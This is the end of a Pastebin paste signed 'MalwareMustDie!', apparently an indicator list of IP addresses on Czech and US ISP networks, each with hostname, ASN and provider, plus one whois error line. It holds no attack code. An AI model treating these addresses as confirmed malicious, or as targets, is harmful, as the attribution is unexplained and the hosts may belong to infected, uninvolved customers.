  559. 95.143.141.50|95-143-141-50.client.ltnet.cz.|196782 | 95.143.128.0/20 | LTNET | CZ | ispalliance.cz | ISP Alliance a.s.
  560. 98.102.44.38|rrcs-98-102-44-38.central.biz.rr.com.|10796 | 98.102.0.0/15 | SCRR-10796 | US | twcable.com | Time Warner Cable Internet LLC
  561. 98.102.44.38|rrcs-98-102-44-38.central.biz.rr.com.|10796 | 98.102.0.0/15 | SCRR-10796 | US | twcable.com | Time Warner Cable Internet LLC
  562. whois: asn.shadowserver.org: hostname nor servname provided, or not known
  563. 98.181.17.39|ip98-181-17-39.br.br.cox.net.|22773 | 98.181.0.0/18 | ASN-CXA-ALL-CCI-2277 | US | cox.com | Cox Communications
  564. 98.209.75.164|c-98-209-75-164.hsd1.mi.comcast.net.|7922 | 98.192.0.0/10 | COMCAST-7922 | US | comcast.net | Comcast Cable Communications Inc.
  565. 98.214.11.253|c-98-214-11-253.hsd1.il.comcast.net.|7922 | 98.192.0.0/10 | COMCAST-7922 | US | comcast.net | Comcast Cable Communications Inc.
  566.  
  567.  
  568. ## MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!